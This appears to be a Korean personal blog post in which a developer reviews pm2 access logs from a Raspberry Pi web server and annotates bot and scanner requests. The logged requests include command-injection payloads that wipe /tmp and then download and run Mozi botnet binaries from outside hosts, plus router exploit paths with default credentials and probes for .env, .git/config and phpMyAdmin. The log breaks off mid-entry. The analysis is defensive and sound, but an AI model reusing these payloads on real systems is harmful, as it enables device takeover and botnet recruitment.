방구석에서 켜져있는 라즈베리파이2에 nodeJS express 게시판을 배포하게 되었다.
그리고는 로그를 남기고 싶은 마음에 express 미들웨어에 코드를 추가했다. 누가 이용을 하는 것인지, 누군가한테 알려주지도 않았는데 들어오는 사람이 있는지 이런 궁금증이 생겼기 때문이다.
배포를 하게 되면 누구나 이런 생각을 하지 않을까?
그냥 pm2 logs나 pm2 monit을 쳐다보고 있어야만 되는줄 알고 이를 로그파일로 저장하도록 따로 작성해야하나 싶었으나, 검색을 해보니 이미 어딘가로 저장되고 있는 것을 알게되었다.
root@ubuntu:~/.pm2/logs# cat index-error.log
root@ubuntu:~/.pm2/logs# cat index-out.logpm2를 전역으로 설치하였으며 아무런 설정을 건드리지 않았을 때 기본적으로 ~/.pm2/logs 밑에 두개의 로그파일이 쌓이게 되며, index-error.log, index-out.log이 있다.
내가 console.log를 통해 출력한 것은 index-out.log에 쌓이며 이를 열어보게 되었다.
신기하게도 들어오는 사람이 있었다. 보통 root자체를 요청했는데, 잘 모르지만 검색엔진 봇으로 추측된다.
뭐 이런 검색엔진 봇이 크롤링을 위해 무작위로 요청하는 것을 상상을 해본 적은 있는데 실제로 이루어지는 것을 확인하니 놀랐다.
그런데 일반적인 웹 브라우저를 통해 정상적으로 사용하는 사용자들의 요청이 아닌 이상한 형태의 요청들이 오는 것을 확인했다.
DNS를 사용하는 것도 아닌데 어떻게 접속하는 것일까 잠깐 생각을 해봤는데, 원래 brute force 방식으로 취약점을 찾고다니는 봇들은 DNS로 만들어진 URL 사용이 가능한 문자들의 조합으로 요청하는 것이 아닌 것 같다. 경우의 수가 ip 그 자체를 대입하는 것이 훨씬 적으니깐.. 아닌가? 아님말고 반박시 니말이 맞음
80포트로 배포하였는데 이런 이유 때문에도 많이 온 것 같다.
아무튼 호기심에 이런 것들을 분석해보게 되었다.
-----
Mon Feb 14 2022 17:55:20 GMT+0900 (Korean Standard Time)
::ffff:58.232.124.38
GET : /shell?cd+/tmp;rm+-rf+*;wget+net.joostjansen.ml/jaws;sh+/tmp/jaws
-----
-----
Mon Feb 14 2022 18:28:57 GMT+0900 (Korean Standard Time)
::ffff:59.94.134.9
GET : /shell?cd+/tmp;rm+-rf+*;wget+http://59.94.134.9:49481/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
-----
-----
Mon Feb 14 2022 19:49:43 GMT+0900 (Korean Standard Time)
::ffff:193.118.53.202
GET : /solr/
-----뭔짓을 하려고 했는지는 바로 파악할 수는 없으나, 뭔가 shell 관련 취약점을 이용하여 아래와 같은 실행하는 과정 같다.
/shell 이후,
cd /tmp;
rm -rf *;
wget http://{요청자 ip addr}/Mozi.a;
chmod 777 Mozi.a;
/tmp/Mozi.a jaws;tmp라는 폴더를 날리고,
Mozi.a를 받아서,
권한 열고,
Mozi.a jaws를 한다 같다.
그런데 저 Mozi.a jaws는 무엇일까?
마지막 줄이 뭔짓을 하는지는 모르겠으나, 결론적으로 Mozi.a 파일을 실행하는 것으로 추측이된다. 그리고 jaws에 대해 검색을 해보니 Java AUGUR Web Server 라는 java 기반의 웹서버를 뜻하는 의미였으며, 이는 /shell 을 통해 셸 실행을 허용하는 취약점이 있다고 한다. 그래서 처음에 shell이라는 command가 들어갔던 것이었다.
또한 저 Mozi.a 파일에 대해서도 검색을 해보니 워낙 유명한 bashdoor취약점이 있는 웹 서버를 찾는 스크립트에 의해 만들진 봇넷이 다운받게하는 파일이었으며, 이는 묵학파를 창시한 중국 철학자 묵자를 뜻한다고 한다. (이건 사실 잘 모르겠음)
또한
에서 누군가 이 파일에 대해 분석해놓은 글을 봤다.
여기서 말하기를 다양한 DDoS 공격, 봇 정보 수집, 지정된 URL의 페이로드 실행과 샘플 업데이트, 시스템 및 사용자 커맨드 실행과 같은 짓을 한다고 한다.
-----
Mon Feb 14 2022 20:08:08 GMT+0900 (Korean Standard Time)
::ffff:185.180.143.79
GET : /showLogin.cc
-----
-----
Mon Feb 14 2022 21:42:46 GMT+0900 (Korean Standard Time)
::ffff:193.142.146.229
POST : /GponForm/diag_Form?script/
-----
-----
Mon Feb 14 2022 21:53:02 GMT+0900 (Korean Standard Time)
::ffff:193.142.146.229
POST : /GponForm/diag_Form?script/
-----
-----
Mon Feb 14 2022 22:36:40 GMT+0900 (Korean Standard Time)
::ffff:193.142.146.229
POST : /GponForm/diag_Form?script/
-----
-----
Mon Feb 14 2022 23:21:41 GMT+0900 (Korean Standard Time)
::ffff:87.65.207.214
GET : /_profiler/phpinfo
-----/showlogin.cc - 뭔지 모르겠다. 검색해도 나오지 않는다.
/GponForm/diag_Form?script/ - GPON라우터 관련 취약점 공격이라고 한다.
/_profiler/phpinfo - 맨뒤에 phpinfo만 봐도 알 수 있듯 php 서버의 뭔가 정보관련 파일에 접근해보는 요청같다.
-----
Tue Feb 15 2022 00:22:24 GMT+0900 (Korean Standard Time)
::ffff:167.94.138.118
PRI : *
-----듣도보도 못한 PRI라는 http method를 가지고 있는 요청이 오게된 것을 확인했다. 훈련소 시절이 떠오르는 무시무시한 요청이다. 검색을 해봤는데 이런애는 없다.
확인을 해보니 HTTP/1.1이 아닌, HTTP/2 요청이 수신되었지만, 서버가 이를 처리하도록 올바르게 설정되지 않았음을 의미한다고 한다.
PRI라는 이름도 무서운데 뭔짓을 하려고 저런 요청을 하는 것일까? 정말 손발이 벌벌 떨린다.
-----
Tue Feb 15 2022 03:46:00 GMT+0900 (Korean Standard Time)
::ffff:67.207.89.123
GET : /.env
-----
-----
Tue Feb 15 2022 03:46:00 GMT+0900 (Korean Standard Time)
::ffff:67.207.89.123
POST : /
-----
-----
Tue Feb 15 2022 06:09:06 GMT+0900 (Korean Standard Time)
::ffff:67.207.89.123
GET : /.env
-----또한 봇넷들이 /.env 쪽에 요청을 보내는 것을 알 수 있다.
보통 오픈소스라던가 협업툴 사용시 보안을 위해 분리를하며 원격저장소에서는 커밋하지 않는 형태로 관리하며, express 몇몇 예제들이나, 관례적으로 API 토큰, 비밀번호, DB 계정, 접속정보를 이곳에 작성하는 것으로 알고있었는데, Docker, Symfony, Django같은 경우에도 이런다고 한다.
-----
Tue Feb 15 2022 09:50:10 GMT+0900 (Korean Standard Time)
::ffff:139.162.145.250
GET : /bag2
-----
-----
Tue Feb 15 2022 09:51:57 GMT+0900 (Korean Standard Time)
::ffff:118.76.109.41
GET : /boaform/admin/formLogin?username=adminisp&psd=adminisp
-----/bag2 - 모르겠다.
/boaform/admin/formLogin?username=adminisp&psd=adminisp - 검색해보니 광섬유 라우터 대상으로 하는 취약점 공격이라고 한다. 뭔가 폼로그인이라는 곳에 쿼리스트링으로 아이디와 비밀번호를 보내는 것을 보니 로그인을 하는 행위이며, 기본 계정의 아이디와 비밀번호가 adminisp인 것 같다.
잊고있다가 어느날 라즈베리파이 로그파일을 직접 열어보게 되었다. 위에 있었던 요청 이후에 받은 것들은 다음과 같다.
너무 자주 중복되는 비슷한 유형과, 검색되지 않는 요청 및 파악할 수 없는 것들은 작성하지 않았다.
-----
Tue Feb 15 2022 19:27:03 GMT+0900 (Korean Standard Time)
::ffff:173.249.53.50
POST : /boaform/admin/formLogin
-----/boaform/admin/formLogin - 잘 모르겠으나 전에 작성한 내용을 확인했을 때 광섬유 라우터 관련 취약점을 통해 관련한 admin 계정으로 접근을 원하는 것 같다.
-----
Tue Feb 15 2022 21:02:30 GMT+0900 (Korean Standard Time)
::ffff:178.72.77.74
GET : /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1
-----위쪽에서 작성한 것과 비슷하게 Mozi.m 파일을 받고 실행시키기 위한 것 같다.
-----
Tue Feb 15 2022 22:41:22 GMT+0900 (Korean Standard Time)
::ffff:176.107.188.252
GET : /.git/config
-----git repo 주소를 알아내고 private하지 않은 repo라면 이를 확인하고 소스를 확인하기 위해 이런 요청을 하는 것인가? 사실 이걸 왜 원하는지 모르겠다.
-----
Wed Feb 16 2022 00:09:55 GMT+0900 (Korean Standard Time)
::ffff:103.156.90.65
GET : /wp-includes/wlwmanifest.xml
-----
-----
Wed Feb 16 2022 00:09:55 GMT+0900 (Korean Standard Time)
::ffff:103.156.90.65
GET : /xmlrpc.php?rsd
-----
-----
Wed Feb 16 2022 00:09:56 GMT+0900 (Korean Standard Time)
::ffff:103.156.90.65
GET : /blog/wp-includes/wlwmanifest.xml
-----
-----
Wed Feb 16 2022 00:09:56 GMT+0900 (Korean Standard Time)
::ffff:103.156.90.65
GET : /web/wp-includes/wlwmanifest.xml
-----
-----
Wed Feb 16 2022 00:09:57 GMT+0900 (Korean Standard Time)
::ffff:103.156.90.65
GET : /wordpress/wp-includes/wlwmanifest.xml
-----
-----
Wed Feb 16 2022 00:09:57 GMT+0900 (Korean Standard Time)
::ffff:103.156.90.65
GET : /website/wp-includes/wlwmanifest.xml
-----
-----
Wed Feb 16 2022 00:09:57 GMT+0900 (Korean Standard Time)
::ffff:103.156.90.65
GET : /wp/wp-includes/wlwmanifest.xml
-----
-----
Wed Feb 16 2022 00:09:58 GMT+0900 (Korean Standard Time)
::ffff:103.156.90.65
GET : /news/wp-includes/wlwmanifest.xml
-----
-----
Wed Feb 16 2022 00:09:58 GMT+0900 (Korean Standard Time)
::ffff:103.156.90.65
GET : /wp1/wp-includes/wlwmanifest.xml
-----
-----
Wed Feb 16 2022 00:09:58 GMT+0900 (Korean Standard Time)
::ffff:103.156.90.65
GET : /test/wp-includes/wlwmanifest.xml
-----
-----
Wed Feb 16 2022 00:09:58 GMT+0900 (Korean Standard Time)
::ffff:103.156.90.65
GET : /wp2/wp-includes/wlwmanifest.xml
-----
-----
Wed Feb 16 2022 00:09:59 GMT+0900 (Korean Standard Time)
::ffff:103.156.90.65
GET : /site/wp-includes/wlwmanifest.xml
-----
-----
Wed Feb 16 2022 00:09:59 GMT+0900 (Korean Standard Time)
::ffff:103.156.90.65
GET : /cms/wp-includes/wlwmanifest.xml
-----
-----
Wed Feb 16 2022 00:09:59 GMT+0900 (Korean Standard Time)
::ffff:103.156.90.65
GET : /sito/wp-includes/wlwmanifest.xml
-----모두 wordpress의 낮은 버전의 취약점을 스캔하는 요청이라고 한다.
-----
Wed Feb 16 2022 03:38:39 GMT+0900 (Korean Standard Time)
::ffff:47.111.227.119
GET : /shell?cd+/tmp;rm+-rf+*;wget+0.0.0.0/jaws;sh+/tmp/jaws
-----위에 작성한 것과 비슷하게 jaws를 통해 특정 자바 웹서버의 셸 command 실행을 시도한다.
-----
Wed Feb 16 2022 17:30:18 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /sql/phpmy-admin/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:30:18 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /phpmyadmin2018/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:30:19 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /PMA2016/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:30:20 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /sql/phpmyadmin3/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:30:21 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /sql/phpMyAdmin/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:30:21 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /phpMyAdmin-4/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:30:22 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /PMA2011/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:30:23 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /phpmyadmin1/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:30:23 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /sql/phpmyadmin4/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:30:24 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /db/myadmin/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:30:25 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /wp-content/plugins/portable-phpmyadmin/wp-pma-mod/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:30:25 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /db/dbweb/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:30:26 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /pma2021/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:30:27 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /db/websql/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:30:27 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /phpmyadmin2013/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:30:28 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /sql/sqladmin/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:30:29 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /phpMyAdmin-3/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:30:29 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /PMA/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:30:30 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /phpmyadmin2019/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:30:31 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /sql/phpmyadmin3/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:30:31 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /PMA2018/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:30:32 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /phpMyAdmin3/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:30:33 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /db/webdb/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:30:33 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /phpmyadmin2019/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:30:34 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /admin/phpMyAdmin/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:30:35 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /phpmy/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:30:35 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /phpMyadmin/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:30:36 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /phpMyAdmin-5.1.1/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:30:37 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /phpmyadmin_/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:30:37 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /phpMyAdmin-4/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:30:38 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /phpmyadmin2021/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:30:39 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /phpmyadmin3/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:30:40 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /admin/sqladmin/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:30:40 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /php-myadmin/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:30:41 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /phpMyAdmin4/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:30:42 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /sql/phpMyAdmin/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:30:42 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /phpmyadmin_/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:30:43 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /pma2021/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:30:44 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /administrator/phpmyadmin/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:30:44 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /pma/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:30:45 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /PMA/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:30:46 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /sql/myadmin/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:30:46 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /phpMyAdmin-5.1.0-english/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:30:47 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /pma2011/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:30:48 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /administrator/web/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:30:48 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /sql/websql/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:30:49 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /PMA2017/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:30:50 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /phpmyadmin/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:30:50 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /php-myadmin/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:30:51 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /admin/pMA/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:30:52 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /sql/php-myadmin/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:30:52 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /sql/phpmyadmin3/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:30:53 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /sql/sqladmin/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:30:54 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /admin/phpmyadmin/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:30:54 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /pma2020/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:30:55 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /db/websql/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:30:56 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /sql/phpmyadmin4/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:30:56 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /pma2015/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:30:57 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /pma2012/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:30:58 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /db/websql/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:30:58 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /phpmyadmin2/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:30:59 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /pma2017/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:31:00 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /phpmyadmin2011/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:31:01 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /PMA2019/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:31:01 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /pma2011/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:31:02 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /mysql/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:31:03 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /phpmyadmin2021/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:31:03 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /phpmyadmin2012/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:31:04 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /phpMyAdmin-4/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:31:05 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /mysql/sqlmanager/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:31:05 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /phpmy-admin/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:31:06 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /db/webdb/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:31:07 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /administrator/web/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:31:07 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /db/phpmyadmin/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:31:08 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /sql/sql/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:31:09 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /PMA2014/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:31:10 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /sql/phpmyadmin4/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:31:10 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /shopdb/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:31:11 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /PMA2013/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:31:12 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /MyAdmin/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:31:12 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /2phpmyadmin/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:31:13 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /PMA/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:31:14 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /php-myadmin/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:31:14 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /phpmyadmin4/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:31:15 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /admin/web/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:31:16 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /pma2016/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:31:16 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /phpmyadmin2014/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:31:17 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /mysql/mysqlmanager/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:31:18 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /phpMyAdmin-5/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:31:18 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /administrator/admin/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:31:19 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /phpmyadmin3/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:31:20 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /phpMyAdmin-5.1.1-english/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:31:20 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /administrator/phpMyAdmin/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:31:21 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /pma2021/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:31:22 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /db/websql/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:31:23 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /db/phpmyadmin3/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:31:23 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /phpmyadmin5/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:31:24 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /phpmyadmin2013/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:31:25 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /database/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:31:25 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /phpmyadmin3/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:31:26 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /database/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:31:27 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /mysql-admin/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:31:27 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /db/dbadmin/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:31:28 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /_phpmyadmin/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:31:29 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /phpmyadmin2016/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:31:29 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /db/websql/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:31:30 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /2phpmyadmin/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:31:31 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /admin/db/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:31:31 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /administrator/db/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:31:32 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /db/dbadmin/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:31:33 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /admin/db/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:31:33 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /PMA2017/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:31:34 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /db/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:31:35 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /mysql/pma/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:31:36 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /mysql/sqlmanager/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:31:36 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /phpmyadmin2020/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:31:37 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /php-my-admin/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:31:38 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /PMA2013/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:31:38 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /administrator/admin/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:31:39 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /sql/webdb/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:31:40 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /sql/phpmyadmin3/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:31:40 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /admin/phpmyadmin/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:31:41 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /sql/phpmyadmin3/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:31:42 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /phpMyAdmin4/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:31:42 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /phpMyAdmin-5.1.1/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:31:43 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /PMA2011/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:31:44 GMT+0900 (Korean Standard Time)
